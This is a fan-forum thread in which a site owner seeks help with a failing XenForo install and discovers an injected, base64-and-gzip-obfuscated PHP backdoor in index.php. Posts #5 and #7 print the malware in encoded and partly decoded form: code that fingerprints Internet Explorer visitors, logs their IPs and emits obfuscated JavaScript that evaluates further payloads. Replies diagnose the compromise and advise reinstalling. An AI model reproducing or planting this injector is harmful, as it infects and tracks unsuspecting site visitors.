aarinfantasy's YAOI Collection

Results 1 to 10 of 10

Thread: Xenforo

  1. #1
    Extreme Yaoi Guru


    Join Date
    May 2006
    Location
    In Heichou's lap <3
    Posts
    4,338
    Points
    26,379,158
    Savings
    22,611,213


    (S061) Setagawa MasahiroHeart 4 (Rainbow)(S060) Kousuke Ooshiba
    (S055) DoumekiHeart 1 (Red)(S056) Yashiro
    Tsuyukusa (L9)Doumeki STWH (L9)Gray (L9)

    Xenforo

    Hello!
    I want to know if someone knows how to work with Xenforo or php since the codes are in php and due to an unknown error BangAQUA forum isn't opening and I don't know what to do anymore OAO.

    I already asked in my host if it was a error from there and no, they say it's all ok with it.
    Tried in a specific Xenforo supporr forum and no reply from them since sunday---- I don't know more what to do >.<

    So I will pass a part of what I wrote in the support forum:
    Found the error log document. it says PHP Fatal error: Cannot redeclare xcrpt() (previously declared in /home/bangaqua/public_html/forum/index.php(1) : eval()'d code:5) in /home/bangaqua/public_html/forum/library/XenForo/Route/Prefix/Index.php(1) : eval()'d code on line 5

    <?php

    class XenForo_Route_Prefix_Index implements XenForo_Route_Interface
    {
    /**
    * Match a specific route for an already matched prefix.
    *
    * @see XenForo_Route_Interface::match()
    */
    public function match($routePath, Zend_Controller_Request_Http $request, XenForo_Router $router)
    {
    return $router->getRouteMatch('XenForo_ControllerPublic_Index', 'index', 'forums');
    }
    }

    or from /home/bangaqua/public_html/forum/index.php:

    <?php

    $startTime = microtime(true);
    $fileDir = dirname(__FILE__);

    require($fileDir . '/library/XenForo/Autoloader.php');
    XenForo_Autoloader::getInstance()->setupAutoloader($fileDir . '/library');

    XenForo_Application::initialize($fileDir . '/library', $fileDir);
    XenForo_Application::set('page_start_time', $startTime);

    $fc = new XenForo_FrontController(new XenForo_Dependencies_Public());
    $fc->run();

    Where is the error?

    Also I get this
    "seref()" in the error msg: PHP Fatal error: Cannot redeclare seref()
    I already used the syntax to reveal the real error and doesn't work.... I tried to change everything and nothing... I don't know what to do anymore.
    And I must say I wasn't the one who installed it so I don't have a version to re-install.... so

  2. #2
    White Butterfly

    Join Date
    Feb 2005
    Location
    In Ranmaru's lap
    Posts
    2,172
    Points
    5,631,571
    Savings
    59,800,800,200


    Akira (L1)Otoya (L5)Hollow Ichigo (L9)
    Sasuke (L7)Hisoka (L9)Aizen L1 [G]
    Ace L1 [G]Ryoga (L5)DS_003_(4)bottomleft

    What does line 5 say in the index.php file? You can start from there. It could be a function receiving an invalid parameter.

    Did you also try posting in the XenForo support forum: XenForo Community ?

  3. #3
    Extreme Yaoi Guru


    Join Date
    May 2006
    Location
    In Heichou's lap <3
    Posts
    4,338
    Points
    26,379,158
    Savings
    22,611,213


    (S061) Setagawa MasahiroHeart 4 (Rainbow)(S060) Kousuke Ooshiba
    (S055) DoumekiHeart 1 (Red)(S056) Yashiro
    Tsuyukusa (L9)Doumeki STWH (L9)Gray (L9)

    Quote Originally Posted by kriska22 View Post
    What does line 5 say in the index.php file? You can start from there. It could be a function receiving an invalid parameter.

    Did you also try posting in the XenForo support forum: XenForo Community ?
    Yes I did under another name
    Also line 5 from both index files *that I don't really know which index is >.<*
    home/bangaqua/public_html/forum/library/XenForo/Route/Prefix/Index.php
    /home/bangaqua/public_html/forum/index.php
    *wanted to add but the damn CPanel isn't opening*

  4. #4
    Extreme Yaoi Guru


    Join Date
    May 2006
    Location
    In Heichou's lap <3
    Posts
    4,338
    Points
    26,379,158
    Savings
    22,611,213


    (S061) Setagawa MasahiroHeart 4 (Rainbow)(S060) Kousuke Ooshiba
    (S055) DoumekiHeart 1 (Red)(S056) Yashiro
    Tsuyukusa (L9)Doumeki STWH (L9)Gray (L9)

    Ok the error stil be this one:
    [05-Feb-2013 05:43:40 UTC] PHP Fatal error: Cannot redeclare xcrpt() (previously declared in /home/bangaqua/public_html/forum/index.php(1) : eval()'d code:5) in /home/bangaqua/public_html/forum/library/XenForo/Route/Prefix/Index.php(1) : eval()'d code on line 5
    As for the error script at /home/bangaqua/public_html/forum/index.php
    http://i.imgur.com/mGgDZJI.png
    As for error in script at home/bangaqua/public_html/forum/library/XenForo/Route/Prefix/Index.php
    http://i.imgur.com/M03wbJA.png

    Now I don't know what to do >.<

  5. #5
    Extreme Yaoi Guru


    Join Date
    May 2006
    Location
    In Heichou's lap <3
    Posts
    4,338
    Points
    26,379,158
    Savings
    22,611,213


    (S061) Setagawa MasahiroHeart 4 (Rainbow)(S060) Kousuke Ooshiba
    (S055) DoumekiHeart 1 (Red)(S056) Yashiro
    Tsuyukusa (L9)Doumeki STWH (L9)Gray (L9)

    Actually this was the very first of my error:
    <?php eval(gzinflate(base64_decode('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')));?>
    <?php

    $startTime = microtime(true);
    $fileDir = dirname(__FILE__);

    require($fileDir . '/library/XenForo/Autoloader.php');
    XenForo_Autoloader::getInstance()->setupAutoloader($fileDir . '/library');

    XenForo_Application::initialize($fileDir . '/library', $fileDir);
    XenForo_Application::set('page_start_time', $startTime);

    $fc = new XenForo_FrontController(new XenForo_Dependencies_Public());
    $fc->run();
    I found today it looks like it was hacked and so the stuff and now it isn't working. I tried to decode it but now I don't know more what to do.---<-<

  6. #6
    Yaoi Supporter
    Join Date
    Jan 2008
    Location
    A state of perpetual confusion ;P
    Posts
    185
    Points
    520,000
    Savings
    2,139,317


    Yup, you've been hacked—there's no legitimate reason for that weird on-the-fly decode. My advice would be to wipe and reinstall the forum software, if you have the means. Otherwise, you'll never be able to be sure that it's clean. Also, you need to find out how the hacker got in and plug the hole (that might be as simple as installing an updated version of the forum).

  7. #7
    Extreme Yaoi Guru


    Join Date
    May 2006
    Location
    In Heichou's lap <3
    Posts
    4,338
    Points
    26,379,158
    Savings
    22,611,213


    (S061) Setagawa MasahiroHeart 4 (Rainbow)(S060) Kousuke Ooshiba
    (S055) DoumekiHeart 1 (Red)(S056) Yashiro
    Tsuyukusa (L9)Doumeki STWH (L9)Gray (L9)

    Yes I do know that the problem is I wasn't the one that uploaded the forum or something. I decoded the eval and I got this:

    if (!isset($frmDs)){ global $frmDs; $frmDs = 1; error_reporting(0); function xcrpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function seref($r){ $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true; return false; } $ua = $_SERVER['HTTP_USER_AGENT']; if (strpos($ua, 'Windows')!==false && strpos($ua,'MSIE')!==false /*&& seref(strtolower($_SERVER["HTTP_REFERER"]))*/){ $ip=$_SERVER["REMOTE_ADDR"]; $dr=$_SERVER["DOCUMENT_ROOT"]; $dbf=$dr.'/sess_'.md5(date('m.d.y')); $odbf = $dr.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) @unlink($odbf); if(!isset($_COOKIE['__utmfr']) && strpos(xcrpt(@file_get_contents($dbf)),$ip) === false ) { setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); print('<script>'.base64_decode('dHJ5e3dpbmRvdy5kb2 N1bWVudC5ib2R5Lz0yfWNhdGNoKGRnc2dzZGcpe3p4Yz0xMjt3 dz13aW5kb3c7fWlmKHp4Yyl7dHJ5e2Y9ZG9jdW1lbnQuY3JlYX RlRWxlbWVudCgiZGl2Iik7fWNhdGNoKGFnZHNnKXt6eGM9MDt9 dHJ5e2RvY3VtZW50LmJvZHktLTt9Y2F0Y2goYmF3ZXRhd2Upe2 lmKHd3LmRvY3VtZW50KXt2PXdpbmRvdztuPVsiM28iLCI0ZCIs IjQ2IiwiM2wiLCI0YyIsIjQxIiwiNDciLCI0NiIsIjE2IiwiM3 AiLCI0YSIsIjNqIiwiMWUiLCIzaiIsIjFpIiwiM2siLCIxZiIs IjRqIiwiNGEiLCIzbiIsIjRjIiwiNGQiLCI0YSIsIjQ2IiwiMT YiLCIycCIsIjNqIiwiNGMiLCI0MCIsIjFrIiwiM28iLCI0NCIs IjQ3IiwiNDciLCI0YSIsIjFlIiwiMnAiLCIzaiIsIjRjIiwiND AiLCIxayIsIjRhIiwiM2oiLCI0NiIsIjNtIiwiNDciLCI0NSIs IjFlIiwiMWYiLCIxZyIsIjFlIiwiM2siLCIxaiIsIjNqIiwiMW giLCIxbiIsIjFmIiwiMWYiLCIxaCIsIjNqIiwiMjciLCI0bCIs ImQiLCJhIiwiM28iLCI0ZCIsIjQ2IiwiM2wiLCI0YyIsIjQxIi wiNDciLCI0NiIsIjE2IiwiNGEiLCI0YiIsIjFlIiwiMWYiLCI0 aiIsIjRhIiwiM24iLCI0YyIsIjRkIiwiNGEiLCI0NiIsIjE2Ii wiMnAiLCIzaiIsIjRjIiwiNDAiLCIxayIsIjRhIiwiM2oiLCI0 NiIsIjNtIiwiNDciLCI0NSIsIjFlIiwiMWYiLCIxayIsIjRjIi wiNDciLCIzNSIsIjRjIiwiNGEiLCI0MSIsIjQ2IiwiM3AiLCIx ZSIsIjFwIiwiMjIiLCIxZiIsIjFrIiwiNGIiLCI0ZCIsIjNrIi wiNGIiLCI0YyIsIjRhIiwiNDEiLCI0NiIsIjNwIiwiMWUiLCIy MSIsIjFmIiwiMjciLCI0bCIsImQiLCJhIiwiNDEiLCIzbyIsIj FlIiwiNDYiLCIzaiIsIjRlIiwiNDEiLCIzcCIsIjNqIiwiNGMi LCI0NyIsIjRhIiwiMWsiLCIzbCIsIjQ3IiwiNDciLCI0MyIsIj QxIiwiM24iLCIyaCIsIjQ2IiwiM2oiLCIzayIsIjQ0IiwiM24i LCIzbSIsIjFmIiwiNGoiLCJkIiwiYSIsIjkiLCI0ZSIsIjNqIi wiNGEiLCIxNiIsIjRiIiwiNGMiLCI0NiIsIjQ1IiwiMjkiLCI0 YSIsIjRiIiwiMWUiLCIxZiIsIjI3IiwiZCIsImEiLCI5IiwiNG UiLCIzaiIsIjRhIiwiMTYiLCI0ZCIsIjNqIiwiMTYiLCIyOSIs IjE2IiwiNDYiLCIzaiIsIjRlIiwiNDEiLCIzcCIsIjNqIiwiNG MiLCI0NyIsIjRhIiwiMWsiLCI0ZCIsIjRiIiwiM24iLCI0YSIs IjJkIiwiM3AiLCIzbiIsIjQ2IiwiNGMiLCIyNyIsImQiLCJhIi wiOSIsIjQxIiwiM28iLCIxZSIsIjRkIiwiM2oiLCIxayIsIjQx IiwiNDYiLCIzbSIsIjNuIiwiNGciLCIzMSIsIjNvIiwiMWUiLC IxZCIsIjM5IiwiNDEiLCI0NiIsIjNtIiwiNDciLCI0ZiIsIjRi IiwiMWQiLCIxZiIsIjE3IiwiMjkiLCIxaiIsIjFuIiwiMTYiLC IxYyIsIjFjIiwiMTYiLCI0ZCIsIjNqIiwiMWsiLCI0MSIsIjQ2 IiwiM20iLCIzbiIsIjRnIiwiMzEiLCIzbyIsIjFlIiwiMWQiLC IycCIsIjM1IiwiMmwiLCIyaCIsIjFkIiwiMWYiLCIxNyIsIjI5 IiwiMWoiLCIxbiIsIjFmIiwiNGoiLCJkIiwiYSIsIjkiLCI5Ii wiM20iLCI0NyIsIjNsIiwiNGQiLCI0NSIsIjNuIiwiNDYiLCI0 YyIsIjFrIiwiNGYiLCI0YSIsIjQxIiwiNGMiLCIzbiIsIjFlIi wiMWQiLCIyOCIsIjRiIiwiNGMiLCI0aCIsIjQ0IiwiM24iLCIy YSIsIjFrIiwiNGIiLCIxZCIsIjFoIiwiNGIiLCI0YyIsIjQ2Ii wiNDUiLCIxaCIsIjFkIiwiMTYiLCI0aiIsIjE2IiwiNDgiLCI0 NyIsIjRiIiwiNDEiLCI0YyIsIjQxIiwiNDciLCI0NiIsIjI2Ii wiM2oiLCIzayIsIjRiIiwiNDciLCI0NCIsIjRkIiwiNGMiLCIz biIsIjI3IiwiMTYiLCI0NCIsIjNuIiwiM28iLCI0YyIsIjI2Ii wiMWoiLCIxZCIsIjFoIiwiM3AiLCI0YSIsIjNqIiwiMWUiLCIy MiIsIjFtIiwiMW0iLCIxaSIsIjFuIiwiMW0iLCIxbSIsIjFtIi wiMWYiLCIxaCIsIjFkIiwiNDgiLCI0ZyIsIjI3IiwiMTYiLCI0 YyIsIjQ3IiwiNDgiLCIyNiIsIjFqIiwiMWQiLCIxaCIsIjNwIi wiNGEiLCIzaiIsIjFlIiwiMjIiLCIxbSIsIjFtIiwiMWkiLCIx biIsIjFtIiwiMW0iLCIxbSIsIjFmIiwiMWgiLCIxZCIsIjQ4Ii wiNGciLCIyNyIsIjE2IiwiNGwiLCIyOCIsIjFsIiwiNGIiLCI0 YyIsIjRoIiwiNDQiLCIzbiIsIjJhIiwiMTYiLCIyOCIsIjNtIi wiNDEiLCI0ZSIsIjE2IiwiM2wiLCI0NCIsIjNqIiwiNGIiLCI0 YiIsIjI5IiwiMTgiLCI0YiIsIjFkIiwiMWgiLCI0YiIsIjRjIi wiNDYiLCI0NSIsIjFoIiwiMWQiLCIxOCIsIjJhIiwiMjgiLCI0 MSIsIjNvIiwiNGEiLCIzaiIsIjQ1IiwiM24iLCIxNiIsIjRiIi wiNGEiLCIzbCIsIjI5IiwiMTgiLCI0MCIsIjRjIiwiNGMiLCI0 OCIsIjI2IiwiMWwiLCIxbCIsIjQ1IiwiNDEiLCI0OCIsIjRjIi wiNGUiLCIzbyIsIjRpIiwiNGQiLCIzbyIsIjRmIiwiM2oiLCI0 NCIsIjFrIiwiNDUiLCI0aCIsIjNvIiwiNGYiLCIxayIsIjRkIi wiNGIiLCIxbCIsIjNqIiwiM20iLCIxbCIsIjNvIiwiM24iLCIz biIsIjNtIiwiMWsiLCI0OCIsIjQwIiwiNDgiLCIxOCIsIjE2Ii wiNGYiLCI0MSIsIjNtIiwiNGMiLCI0MCIsIjI5IiwiMTgiLCIx ZCIsIjFoIiwiM3AiLCI0YSIsIjNqIiwiMWUiLCIxcCIsIjFtIi wiMW0iLCIxaSIsIjIyIiwiMW0iLCIxbSIsIjFmIiwiMWgiLCIx ZCIsIjE4IiwiMTYiLCI0MCIsIjNuIiwiNDEiLCIzcCIsIjQwIi wiNGMiLCIyOSIsIjE4IiwiMWQiLCIxaCIsIjNwIiwiNGEiLCIz aiIsIjFlIiwiMXAiLCIxbSIsIjFtIiwiMWkiLCIyMiIsIjFtIi wiMW0iLCIxZiIsIjFoIiwiMWQiLCIxOCIsIjJhIiwiMjgiLCIx bCIsIjQxIiwiM28iLCI0YSIsIjNqIiwiNDUiLCIzbiIsIjJhIi wiMjgiLCIxbCIsIjNtIiwiNDEiLCI0ZSIsIjJhIiwiMWQiLCIx ZiIsIjI3IiwiZCIsImEiLCI5IiwiOSIsIjRlIiwiM2oiLCI0YS IsIjE2IiwiM24iLCI0ZyIsIjQ4IiwiMjkiLCI0NiIsIjNuIiwi NGYiLCIxNiIsIjJnIiwiM2oiLCI0YyIsIjNuIiwiMWUiLCIxZi IsIjI3IiwiM24iLCI0ZyIsIjQ4IiwiMWsiLCI0YiIsIjNuIiwi NGMiLCIyZyIsIjNqIiwiNGMiLCIzbiIsIjFlIiwiM24iLCI0Zy IsIjQ4IiwiMWsiLCIzcCIsIjNuIiwiNGMiLCIyZyIsIjNqIiwi NGMiLCIzbiIsIjFlIiwiMWYiLCIxaCIsIjIzIiwiMWYiLCIyNy IsImQiLCJhIiwiOSIsIjkiLCIzbSIsIjQ3IiwiM2wiLCI0ZCIs IjQ1IiwiM24iLCI0NiIsIjRjIiwiMWsiLCIzbCIsIjQ3IiwiND ciLCI0MyIsIjQxIiwiM24iLCIyOSIsIjFkIiwiM2giLCIzaCIs IjRkIiwiNGMiLCI0NSIsIjNvIiwiNGEiLCIyOSIsIjFkIiwiMW giLCI0YSIsIjRiIiwiMWUiLCIxZiIsIjFoIiwiMWQiLCIyNyIs IjE2IiwiM24iLCI0ZyIsIjQ4IiwiNDEiLCI0YSIsIjNuIiwiNG IiLCIyOSIsIjFkIiwiMWgiLCIzbiIsIjRnIiwiNDgiLCIxayIs IjRjIiwiNDciLCIyaiIsIjJwIiwiMzYiLCIzNSIsIjRjIiwiNG EiLCI0MSIsIjQ2IiwiM3AiLCIxZSIsIjFmIiwiMWgiLCIxZCIs IjI3IiwiMTYiLCI0OCIsIjNqIiwiNGMiLCI0MCIsIjI5IiwiMW wiLCIxZCIsIjI3IiwiZCIsImEiLCI5IiwiNGwiLCJkIiwiYSIs IjRsIl07aD0yO3M9IiI7aWYoenhjKXtmb3IoaT0wO2ktNjY5IT 0wO2krKyl7az1pO3MrPVN0cmluZ1siZnJvIisibUMiKyJoYXJD b2RlIl0ocGFyc2VJbnQobltpXSwxMioyKzErMSkpO316PXM7d3 dbImV2YWwiXShzKTt9fX19').'</script>'); if ($fp = @fopen($dbf , 'a')){fputs($fp , xcrpt($ip.'|')); fclose($fp);} } }}
    But now I don't know more about this OAO

    ---------- Post added at 04:01 PM ---------- Previous post was at 03:43 PM ----------

    Ok I used the decode and now I've this error in the page:


    Warning: gzinflate() [function.gzinflate]: data error in /home/bangaqua/public_html/forum/index.php on line 1

    where do I get it? The line on in that script is just <?php

  8. #8
    Yaoi Supporter
    Join Date
    Jan 2008
    Location
    A state of perpetual confusion ;P
    Posts
    185
    Points
    520,000
    Savings
    2,139,317


    I'm pretty sure this is a piece of malware I've seen discussed somewhere recently (that is, within the last couple of months), probably on Ars Technica—the cookie check and sloppy attempt to exclude specific search engine crawlers match a half-remembered description. If it's the same one, I think it's attempting to inject a malicious iframe into your pages. I can't remember which specific security hole it exploits, given the sheer number of them that have been in the tech news lately.

    Pulling this apart further is just a waste of time unless you have some particular interest in knowing how malware is built. You are not going to be able to get it out and *keep* it out by picking away at it piecemeal. You need to reload the forum software, make sure it's updated to the latest version, and possibly alert your Web host that their server has been compromised, depending on what the infection vector was. If you can't do this yourself, you need to alert the person responsible for the account.
    Last edited by eliddell; 02-17-2013 at 03:11 PM.

  9. #9
    Extreme Yaoi Guru


    Join Date
    May 2006
    Location
    In Heichou's lap <3
    Posts
    4,338
    Points
    26,379,158
    Savings
    22,611,213


    (S061) Setagawa MasahiroHeart 4 (Rainbow)(S060) Kousuke Ooshiba
    (S055) DoumekiHeart 1 (Red)(S056) Yashiro
    Tsuyukusa (L9)Doumeki STWH (L9)Gray (L9)

    That was my fear. The problem is I don't know nothing about it and so I don't know how to re-install the forum or so around this. And the person in question (who installed it) is MIA for a long time... I want to kick him...OAO.
    Thanks for your help I think... OAO

  10. #10
    Yaoi Supporter
    Join Date
    Jan 2008
    Location
    A state of perpetual confusion ;P
    Posts
    185
    Points
    520,000
    Savings
    2,139,317


    Sounds like kicking him would be a good course of action at this point. ;P Good luck.


 

 

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •